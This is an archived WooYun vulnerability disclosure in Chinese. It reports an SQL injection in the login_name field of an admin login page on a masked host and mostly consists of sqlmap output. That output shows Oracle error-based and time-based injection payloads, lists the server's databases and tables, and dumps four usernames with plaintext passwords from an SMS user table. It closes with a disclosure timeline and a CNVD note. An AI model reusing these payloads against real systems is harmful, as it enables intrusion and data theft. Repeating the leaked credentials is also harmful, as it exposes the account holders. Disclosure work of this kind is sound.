乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-11: 细节已通知厂商并且等待厂商处理中 2015-10-16: 厂商已经确认,细节仅向厂商公开 2015-10-26: 细节向核心白帽子及相关领域专家公开 2015-11-05: 细节向普通白帽子公开 2015-11-15: 细节向实习白帽子公开 2015-11-30: 细节向公众公开
如题
地址:**.**.**.**:8080/adminLogindo.htm注入参数:login_name
POST parameter 'login_name' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection points with a total of 53 HTTP(s) requests:---Place: POSTParameter: login_name Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: cookieexists=false&login_name=admin' AND 1776=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(100)||CHR(100)||CHR(116)||CHR(113)||(SELECT (CASE WHEN (1776=1776) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(105)||CHR(97)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND 'WjAM'='WjAM&pwd=admin&imgCode=2357 Type: AND/OR time-based blind Title: Oracle AND time-based blind (heavy query) Payload: cookieexists=false&login_name=admin' AND 4143=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'VyZJ'='VyZJ&pwd=admin&imgCode=2357---[20:26:23] [INFO] the back-end DBMS is Oracleback-end DBMS: Oracle[20:26:23] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/**.**.**.**'
available databases [8]:[*] CTXSYS[*] DX[*] EXFSYS[*] MDSYS[*] OLAPSYS[*] SYS[*] SYSTEM[*] WMSYS
Database: EXFSYS[1 table]+--------------------------------+| RLM$PARSEDCOND |+--------------------------------+Database: OLAPSYS[9 tables]+--------------------------------+| CWM2$AWCUBECREATEACCESS || CWM2$AWDIMCREATEACCESS || CWM2$_AW_NEXT_TEMP_CUST_MEAS || CWM2$_AW_TEMP_CUST_MEAS_MAP || CWM2$_TEMP_VALUES || OLAP_SESSION_CUBES || OLAP_SESSION_DIMS || XML_LOAD_LOG || XML_LOAD_RECORDS |+--------------------------------+Database: SYSTEM[8 tables]+--------------------------------+| DEF$_TEMP$LOB || HELP || MVIEW$_ADV_INDEX || MVIEW$_ADV_OWB || MVIEW$_ADV_PARTITION || OL$ || OL$HINTS || OL$NODES |+--------------------------------+Database: SYS[30 tables]+--------------------------------+| DUAL || AUDIT_ACTIONS || AW$AWCREATE || AW$AWCREATE10G || AW$AWMD || AW$AWREPORT || AW$AWXML || AW$EXPRESS || IMPDP_STATS || KU$NOEXP_TAB || ODCI_SECOBJ$ || ODCI_WARNINGS$ || OLAPI_HISTORY || OLAPI_IFACE_OBJECT_HISTORY || OLAPI_IFACE_OP_HISTORY || OLAPI_MEMORY_HEAP_HISTORY || OLAPI_MEMORY_OP_HISTORY || OLAPI_SESSION_HISTORY || OLAPTABLEVELS || OLAPTABLEVELTUPLES || OLAP_OLEDB_FUNCTIONS_PVT || OLAP_OLEDB_KEYWORDS || OLAP_OLEDB_MDPROPS || OLAP_OLEDB_MDPROPVALS || PLAN_TABLE$ || PSTUBTBL || STMT_AUDIT_OPTION_MAP || SYSTEM_PRIVILEGE_MAP || TABLE_PRIVILEGE_MAP || WRI$_ADV_ASA_RECO_DATA |+--------------------------------+Database: MDSYS[36 tables]+--------------------------------+| OGIS_GEOMETRY_COLUMNS || OGIS_SPATIAL_REFERENCE_SYSTEMS || SDO_COORD_AXES || SDO_COORD_AXIS_NAMES || SDO_COORD_OPS || SDO_COORD_OP_METHODS || SDO_COORD_OP_PARAMS || SDO_COORD_OP_PARAM_USE || SDO_COORD_OP_PARAM_VALS || SDO_COORD_OP_PATHS || SDO_COORD_REF_SYS || SDO_COORD_SYS || SDO_CS_SRS || SDO_DATUMS || SDO_DATUMS_OLD_SNAPSHOT || SDO_ELLIPSOIDS || SDO_ELLIPSOIDS_OLD_SNAPSHOT || SDO_GEOR_PLUGIN_REGISTRY || SDO_GEOR_XMLSCHEMA_TABLE || SDO_GR_MOSAIC_0 || SDO_GR_MOSAIC_1 || SDO_GR_MOSAIC_2 || SDO_GR_MOSAIC_3 || SDO_GR_RDT_1 || SDO_PREFERRED_OPS_SYSTEM || SDO_PREFERRED_OPS_USER || SDO_PRIME_MERIDIANS || SDO_PROJECTIONS_OLD_SNAPSHOT || SDO_TOPO_DATA$ || SDO_TOPO_RELATION_DATA || SDO_TOPO_TRANSACT_DATA || SDO_TXN_IDX_DELETES || SDO_TXN_IDX_EXP_UPD_RGN || SDO_TXN_IDX_INSERTS || SDO_UNITS_OF_MEASURE || SDO_XML_SCHEMAS |+--------------------------------+Database: DX[62 tables]+--------------------------------+| CLASS || CRM_DICTIONARY_PY || CURRENT_NODE || I_SMS_HISTORY_INFO || I_SMS_TOKEN_INFO || I_SMS_USER_INFO || I_SMS_USER_INFO_HIS || NODEINFO || P_RECEIVE_SMS || P_SEND_SMS || T || TEMP1 || TEMP_STATUS || TEMP_T || T_CITY_INFO || T_LOGS || T_MOBILE || T_MOBILE_BAK || T_ONLINE || T_SYSLOGIN_LOG || T_SYSMODEL_INFO || T_SYSMODEL_OPER || T_SYSROLE_INFO || T_SYSROLE_MODEL || T_SYSROLE_MODELAUTH || T_SYSUSER_INFO || T_TEMPIMPORTDATA || T_TEMPIMPORTDATA_FAIL || T_TEMPLETINFO || T_TPCOLUMS || T_TPCONTENT || T_UPLOADLOG || U_ACCOUNT || U_CACHE_MMS || U_CACHE_MMS_DEL || U_CACHE_SMS || U_CACHE_SMS_20131130 || U_CACHE_SMS_F || U_CACHE_SMS_HIS || U_CACHE_SMS_TEMP || U_CACHE_SMS_TEST || U_CONF_MMS || U_CONF_SMS || U_DEPARTMENT || U_DEPARTMENT_TEMP || U_MEDIA_INFO || U_MMS_INFO || U_PICTURE_INFO || U_PRODUCTS_INFO || U_SEND_MMS || U_SEND_MMS_HIS || U_SEND_SMS || U_SEND_SMS_HIS || U_SMS_INFO || U_SMS_PLATE || U_SMS_RECEIVE || U_SP_INFO || U_STAFF || U_STAFF_TAG || U_TEXT_INFO || U_WHITE_LIST || V_PRO_MMS |+--------------------------------+Database: CTXSYS[3 tables]+--------------------------------+| DR$NUMBER_SEQUENCE || DR$OBJECT_ATTRIBUTE || DR$POLICY_TAB |+--------------------------------+Database: WMSYS[4 tables]+--------------------------------+| WM$NEXTVER_TABLE || WM$VERSION_HIERARCHY_TABLE || WM$VERSION_TABLE || WM$WORKSPACES_TABLE |+--------------------------------+
Database: DXTable: I_SMS_USER_INFO[4 entries]+---------------+-----------+| PASSWORD | USER_NAME |+---------------+-----------+| 3ggx@icampus | 3ggx || 3ggx2@icampus | 3ggx2 || Jgxy6187 | gsjgy || lzjyzx@123456 | lzjyzx |+---------------+-----------+
过滤;
危害等级:中
漏洞Rank:10
确认时间:2015-10-16 11:12
CNVD确认所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理单位处置
暂无
